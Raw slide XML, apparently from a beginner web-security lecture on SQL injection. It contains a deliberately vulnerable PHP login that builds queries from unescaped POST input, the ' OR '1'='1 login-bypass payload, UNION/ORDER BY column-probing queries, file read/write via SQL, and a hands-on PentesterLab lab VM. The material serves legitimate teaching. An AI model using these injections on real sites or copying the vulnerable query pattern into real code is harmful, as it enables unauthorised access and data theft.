              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>UNION SELECT 1,2  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>UNION SELECT 1,2,3 ....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Can be used in SQLi to determine the size of a query (We'll see this in the demo)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SQL Basics - UNION + LIMIT</a:t>
            </a:r>
          </a:p>
        </p:txBody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Say we have a news query like such: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SELECT * FROM `news` WHERE `news_id` = 121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and it has 90000 results...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We can limit the results via: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SELECT * FROM `news` WHERE `news_id` = 121 LIMIT 9000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SELECT * FROM `news` WHERE `news_id` = 121 LIMIT X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>where X is some integer (0, 1, 2, 3, etc...)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SQL Basics - Order by</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Shape 56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mySQL 4+ allows for reordering of data with "Order by" operator.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 sz="3000"/>
              <a:t>SELECT X,Y,Z from table1 order by 1/*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 sz="3000"/>
              <a:t>SELECT X,Y,Z from table1 order by 2/*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 sz="3000"/>
              <a:t>SELECT X,Y,Z from table1 order by 3/*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/>
              <a:t>Can be used in SQLi to determine the size of a query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SQL file system access</a:t>
            </a:r>
          </a:p>
        </p:txBody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SELECT ... LOAD_INFILE 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is used to read file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SELECT INTO OUTFILE/DUMPFILE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is used to write file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super dangerous!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/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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Shape 572"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4836036"/>
            <a:ext cx="7772400" cy="103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basics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 types of SQLi	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Shape 57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4800"/>
              <a:t>Inband (AKA "Error-based")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-5334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4800"/>
              <a:t>Out-of-band (AKA "Union-Based")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-5334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4800"/>
              <a:t>and Inferential (AKA "Blind")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SQLi Attack Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Shape 58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u="sng"/>
              <a:t>Identify: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The injection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the injection type (integer or string)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u="sng"/>
              <a:t>Attack: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Error-based SQLi (Easiest)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Union-based SQLi (Best data extractor)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Blind SQLi (Worst case)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SQL Vulnerability Scanners</a:t>
            </a:r>
          </a:p>
        </p:txBody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Union-based is where the $$$ is at. (Best data extractor)  But most tools don't do it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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="591" name="Shape 591"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="871800" y="222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{927AFFBE-70E4-4FC7-8A94-46933CCBDF17}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mieliekoek.pl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(error)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wpoison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(error)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sqlmap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(blind by default, and union if specified)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wapiti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(error)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w3af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(error, blind)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paros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(error, blind)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sqid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(error)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Lets get on with it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Shape 59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br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>//connect to db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$conn = mysql_connect("localhost","username","password");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//build SQL statement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$query = "SELECT id, name FROM users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WHERE name = '$_POST["username"]' ".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"AND password = '$_POST["password"]' ";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/>
              <a:t>...............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//run query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$result = mysql_query ($query);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//ensure a user was returned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$numrows = mysql_num_rows($result);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if($numrows != 0)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header("Location:admin.php");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} else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die('Invalid username or password.');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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="598" name="Shape 5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500" y="2464650"/>
            <a:ext cx="2800350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Shape 599"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392100" y="1599775"/>
            <a:ext cx="85527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/>
              <a:t>The admin login php code ON BAD WEBSITES will usually look like this, in some point of time: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20075"/>
            <a:ext cx="2679700" cy="17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 Architecture Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Shape 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6782625" y="3067175"/>
            <a:ext cx="1477200" cy="1437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92" name="Shape 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2870089" y="3358538"/>
            <a:ext cx="2139000" cy="9153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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131350" y="4590425"/>
            <a:ext cx="1497000" cy="116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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772725" y="4590425"/>
            <a:ext cx="1497000" cy="116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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Shape 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672225" y="1849045"/>
            <a:ext cx="1587600" cy="116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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4521750" y="2662825"/>
            <a:ext cx="1688148" cy="1256040"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="97" name="Shape 97"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="96" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904350" y="3014545"/>
            <a:ext cx="3617400" cy="2763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8" name="Shape 98"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="874350" y="3506875"/>
            <a:ext cx="3687600" cy="1506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9" name="Shape 99"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="96" idx="3"/>
            <a:endCxn id="91" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6209898" y="3290845"/>
            <a:ext cx="5727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00" name="Shape 100"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="95" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6139425" y="2431795"/>
            <a:ext cx="532800" cy="49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01" name="Shape 101"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029000" y="3918850"/>
            <a:ext cx="834000" cy="70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02" name="Shape 102"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="96" idx="2"/>
            <a:endCxn id="93" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5365824" y="3918865"/>
            <a:ext cx="513900" cy="67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103" name="Shape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513286" y="1557500"/>
            <a:ext cx="2100114" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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Click jacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Shape 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208486" y="3691100"/>
            <a:ext cx="1656072" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122886" y="4072100"/>
            <a:ext cx="1656072" cy="1205820"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2613400" y="1883845"/>
            <a:ext cx="1332000" cy="10959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Packet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Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Shape 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206200" y="3251480"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Parameter 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Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Shape 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797000" y="3784880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Forged Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5711400" y="3708680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Direct Object Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Shape 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787600" y="2946680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Shape 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492200" y="2260880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016200" y="1422680"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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XML Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Shape 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5648202" y="1704166"/>
            <a:ext cx="782700" cy="77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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581182" y="1704166"/>
            <a:ext cx="935400" cy="77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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Shape 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3943588" y="4752166"/>
            <a:ext cx="1115700" cy="77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(Java)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172188" y="5590366"/>
            <a:ext cx="1115700" cy="77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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5391388" y="5666566"/>
            <a:ext cx="1115700" cy="77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MORE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4111200" y="4546880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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0days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4720800" y="5156480"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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0days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4416000" y="1270280"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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0days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5559000" y="1879880"/>
            <a:ext cx="1540188" cy="1068390"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:pr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0days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login example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Shape 60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br>
              <a:rPr lang="en" sz="1400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SELECT id, name FROM users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WHERE name =</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>'owen'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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AND password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>kittens'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> 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606" name="Shape 6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525" y="2464650"/>
            <a:ext cx="2800350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Shape 607"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500900" y="3374775"/>
            <a:ext cx="8874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owen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Shape 608"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477800" y="3743625"/>
            <a:ext cx="933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kittens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9" name="Shape 609"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714825" y="4400600"/>
            <a:ext cx="3457800" cy="16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correct implementations will use hashed passwords though, and this is handled in the logic layer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login manipulation example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Shape 61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br>
              <a:rPr lang="en" sz="1400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SELECT id, name FROM users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WHERE name ='owen'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AND password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anything' OR '1' = '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>';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616" name="Shape 6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525" y="2464650"/>
            <a:ext cx="2800350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Shape 617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500900" y="3374775"/>
            <a:ext cx="8874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owen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6477800" y="3743625"/>
            <a:ext cx="31353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lololol' OR '1'='1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9" name="Shape 619"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714825" y="4400600"/>
            <a:ext cx="5521200" cy="16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note the tick (') placement in the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="620" name="Shape 620"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3792275" y="4077725"/>
            <a:ext cx="3918900" cy="50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21" name="Shape 621"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118250" y="5345750"/>
            <a:ext cx="63855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This is a TOY example, and is unlikely to occur in most sites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ME COOL STUFF!!!!1!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Shape 627"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="47721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Our hands-on example for today:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.pentesterlab.com/from_sqli_to_shell.html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Get the .iso and the .pdf if you haven't already.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Boot it up in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng"/>
              <a:t>VMware Player</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2400" u="sng"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(I've had networking problems with Virtual Box)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28" name="Shape 6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6007" y="1569450"/>
            <a:ext cx="3917993" cy="5277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Ok boot up the VM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Shape 63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Steps we will take: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Enumeration (Discovery)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Vulnerability Analysis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Vulnerability Exploitation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???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Profit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Find the IP of the VM you just booted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Shape 64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41" name="Shape 6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0200"/>
            <a:ext cx="8221806" cy="5235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/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 Proxy demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>+</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQLi demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="Shape 647"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4836036"/>
            <a:ext cx="7772400" cy="103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We'll use Burpsuite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://www.portswigger.net/burp/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First some notes on encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Shape 65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HTML (URL) Encoding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converts characters into a format that can be transmitted over the internet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ASCII character set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*unsafe* ASCII characters are replaced by %XX were XX are two hexadecimal digits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>spaces are replaced with %20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>or by a plus sign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o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http://www.w3schools.com/tags/ref_urlencode.asp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="654" name="Shape 6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9025" y="3986625"/>
            <a:ext cx="4048125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unicode encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Shape 66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unicode = universal character set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aims to be a superset of all other character sets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aimed for broad language support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http://www.w3.org/International/articles/definitions-characters/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UTF-8 uses 1 byte to represent characters in the ASCII set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two bytes for characters in other alphabets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3 bytes for things in the "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>asic </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ultilingual </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>lane"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4 bytes for supplementary characters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UTF-16 uses 2bytes for anything in the BMP, 4 bytes for supplementary characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UTF-32 uses 4 bytes for all characters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unicode character escapes</a:t>
            </a:r>
          </a:p>
        </p:txBody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character escape is a way of representing the character without using the character itself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%20 is space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%41 should be 'A'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etc..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This is useful info for attackers when bypassing filters!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Manually detecting web vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Shape 67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Can fuzz the actual HTTP requests with the proxy (burspsuite / web scarab).   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en"/>
              <a:t>Fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>things like the login page, etc...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Can also detect sql injection.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goto http://192.168.43.130/cat.php?id=1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and try adding </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> onto the end of the URL.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20075"/>
            <a:ext cx="2679700" cy="17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 Architecture Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6782625" y="3067175"/>
            <a:ext cx="1477200" cy="1437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129" name="Shape 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2870089" y="3358538"/>
            <a:ext cx="2139000" cy="9153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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Shape 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131350" y="4590425"/>
            <a:ext cx="1497000" cy="116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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Shape 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772725" y="4590425"/>
            <a:ext cx="1497000" cy="116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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Shape 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672225" y="1849045"/>
            <a:ext cx="1587600" cy="116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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Shape 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
